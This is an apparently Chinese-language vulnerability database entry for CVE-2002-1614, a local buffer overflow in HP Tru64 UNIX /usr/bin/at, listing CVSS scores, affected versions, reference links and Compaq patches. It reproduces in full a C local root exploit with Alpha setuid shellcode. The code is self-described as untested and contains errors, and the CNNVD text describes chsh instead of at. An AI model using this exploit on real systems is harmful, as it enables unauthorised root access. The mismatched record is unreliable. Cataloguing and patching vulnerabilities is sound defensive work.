CVE-2002-1614
CVSS7.2
发布时间 :2002-09-09 00:00:00
修订时间 :2011-03-07 21:10:32
NMCOE    

[原文]Buffer overflow in HP Tru64 UNIX allows local users to execute arbitrary code via a long argument to /usr/bin/at.


[CNNVD]Tru64 chsh本地权限提升漏洞(CNNVD-200209-025)

        
        Tru64是一款由HP公司开发的Unix操作系统,其中包含chsh工具可以用来更改当前用户相关信息。
        Tru64中的chsh工具存在漏洞,本地攻击者可以利用这个漏洞提升权限。
        部分HP Tru64操作系统的chsh工具存在问题,允许非特权用户获得root用户权限。
        没有具体技术细节描述。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:hp:tru64:5.1HP Compaq Tru64 5.1
cpe:/o:hp:tru64:4.0gHP Tru64 4.0g
cpe:/o:hp:hp-ux:11.22HP-UX 11i v1.6
cpe:/o:hp:hp-ux:11.04HP HP-UX 11.04
cpe:/o:hp:tru64:4.0fHP Tru64 4.0f
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:tru64:5.0aHP Tru64 5.0a
cpe:/o:hp:tru64:5.1aHP Tru64 5.1a
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:11.11HP-UX 11.11

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1614
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1614
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200209-025
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/435611
(VENDOR_ADVISORY)  CERT-VN  VU#435611
http://xforce.iss.net/xforce/xfdb/10016
(VENDOR_ADVISORY)  XF  tru64-multiple-binaries-bo(10016)
http://www.securityfocus.com/archive/1/290115
(VENDOR_ADVISORY)  BUGTRAQ  20020902 Happy Labor Day from Snosoft
http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?source=SRB0039W.xml&dt=11
(UNKNOWN)  HP  SSRT2189
http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
(UNKNOWN)  FULLDISC  20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification
http://archives.neohapsis.com/archives/fulldisclosure/2002-q3/1203.html
(UNKNOWN)  FULLDISC  20020919 iDEFENSE OSF1/Tru64 3.x vuln clarification

- 漏洞信息

Tru64 chsh本地权限提升漏洞
高危 边界条件错误
2002-09-09 00:00:00 2005-10-20 00:00:00
远程※本地  
        
        Tru64是一款由HP公司开发的Unix操作系统,其中包含chsh工具可以用来更改当前用户相关信息。
        Tru64中的chsh工具存在漏洞,本地攻击者可以利用这个漏洞提升权限。
        部分HP Tru64操作系统的chsh工具存在问题,允许非特权用户获得root用户权限。
        没有具体技术细节描述。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时没有合适的临时解决方法。
        厂商补丁:
        Compaq
        ------
        Compaq已经为此发布了一个安全公告(SSRT2257)以及相应补丁:
        SSRT2257:HP Tru64 UNIX /usr/bin/su buffer overflow potential exploit
        链接:
        http://wwss1pro.compaq.com/support/reference_library/viewdocument.asp?countrycode=1000&prodid=811|Tr

        补丁下载:
        Compaq Tru64 4.0 g:
        Compaq Patch t64v40gb17-c0010404-14948-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v4.0g/t64v40gb17-c0010404-14948-es-20020730.tar

        Compaq Tru64 4.0 f:
        Compaq Patch duv40fb18-c0067403-14947-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v4.0f/duv40fb18-c0067403-14947-es-20020730.tar

        Compaq Tru64 5.0 a:
        Compaq Patch t64v50ab17-c0018404-14949-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v5.0a/t64v50ab17-c0018404-14949-es-20020730.tar

        Compaq Tru64 5.1 a:
        Compaq Patch t64v51ab2-c0041400-14950-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v5.1a/t64v51ab2-c0041400-14950-es-20020730.tar

        Compaq Tru64 5.1:
        Compaq Patch t64v51b19-c0136900-14951-es-20020730.tar
        
        http://ftp.support.compaq.com/patches/public/unix/v5.1/t64v51b19-c0136900-14951-es-20020730.tar

- 漏洞信息 (281)

Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit (EDBID:281)
tru64 local
2001-03-02 Verified
0 Cody Tubbs
N/A [点击下载]
/*
 * Tru64 UNIX 4.0g (JAVA) (/usr/bin/at) local root exploit. [ALPHA]
 *
 * Author: Cody Tubbs (loophole of hhp).
 * Site:   www.hhp-programming.net
 * Email:  pigspigs@yahoo.com
 * Date:   2/1/2000.
 *
 * I made this without access to gdb, It's untested...
 * may require modification, may require deletion, heh.
 *
 * Note: executable_stack must be on.
 */

#include <stdio.h>
#include <string.h>

#define OFFSET 0
#define ALLIGN 0
#define NOP    "\x1f\x04\xff\x47"
#define DBUF   8000 // 5604+4+528? Manipulate if needed.

char shellcode[]= // Alpha setuid(0);+ execl("/bin/sh","sh",0);
 "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42\xfc\xff\x32"
 "\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2\xff\x47\x3f\x26\x1f\x04"
 "\x31\x22\xfc\xff\x30\xb2\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11"
 "\x14\xe3\x43\x20\x35\x20\x42\xff\xff\xff\xff"
 "\x30\x15\xd9\x43\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e"
 "\xb6\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22\x13\x05"
 "\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26\x2f\x62\x73\x22\x38"
 "\xff\x7e\xb2\x13\x94\xe7\x43\x20\x35\x60\x42\xff\xff\xff\xff";
 //Taeho Oh shellcode.

//long get_sp(void){ __asm__("bis $31,$30,$0");}

void usage(char *arg) {
  fprintf(stderr, "\nTru64 UNIX 4.0g (JAVA) (/usr/bin/at)");
  fprintf(stderr, " local root exploit. [ALPHA] \n";
  fprintf(stderr, "Author: Cody Tubbs (loophole of hhp)\n\n");
  fprintf(stderr, "Usage: %s <offset> [allign(0..3)]\n", arg);
  fprintf(stderr, "Examp: %s 0\n", arg);
  fprintf(stderr, "Examp: %s 0 1\n", arg);
  exit(1);
}

main(int argc, char **argv){
 char eipeip[DBUF], buffer[4096], heh[DBUF+1];
 char *nop;
 int i, offset, allign;
 long address;

 if(argc < 2){
  usage(argv[0]);
 }

 if(argc>1){offset=atoi(argv[1]);}else{offset=OFFSET;}
 if(argc>2){allign=atoi(argv[2]);}else{allign=ALLIGN;}

//address = get_sp() - offset;
address = i& - offset;

 if(allign>0){for(i=0;i<DBUF;i++){eipeip[i]=0x69;}}
 for(i=allign;i<DBUF;i+=4){*(long *)&eipeip[i]=address;}

 nop=NOP;

 for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
  //buffer[i]=nop[i%4];
  buffer[i]   = 0x1f;
  buffer[++i] = 0x04;
  buffer[++i] = 0xff;
  buffer[++i] = 0x47;
 }

 memcpy(buffer+i,shellcode,strlen(shellcode));
 memcpy(buffer,"ATEX=",5); 
 putenv(buffer);

 fprintf(stderr,"Return address %#x, offset: %d.\n",address,offset);
 execlp("/usr/bin/at","at", eipeip, 0);
}


// milw0rm.com [2001-03-02]
		

- 漏洞信息

18200
HP Tru64 UNIX /usr/bin/at Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-09-09 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站